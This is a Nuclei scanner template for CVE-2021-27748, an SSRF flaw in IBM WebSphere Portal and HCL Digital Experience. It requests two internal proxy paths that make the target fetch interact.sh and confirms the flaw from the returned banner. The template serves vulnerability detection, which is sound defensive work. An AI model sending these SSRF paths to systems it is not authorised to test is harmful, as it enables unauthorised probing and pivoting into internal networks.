nuclei-templates/cves/2021/CVE-2021-27748.yaml

33 lines
892 B
YAML
Raw Normal View History

2022-06-06 10:53:02 +00:00
id: CVE-2021-27748
info:
name: IBM WebSphere Portal SSRF
author: pdteam
severity: high
2022-06-06 10:53:02 +00:00
description: |
A Server Side Request Forgery vulnerability affects HCL Digital Experience, on-premise deployments and containers.
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
2022-06-06 10:53:02 +00:00
- https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
classification:
cve-id: CVE-2021-27748
tags: cve,cve2021,hcl,ibm,ssrf,websphere
requests:
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh'
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<h1> Interactsh Server </h1>"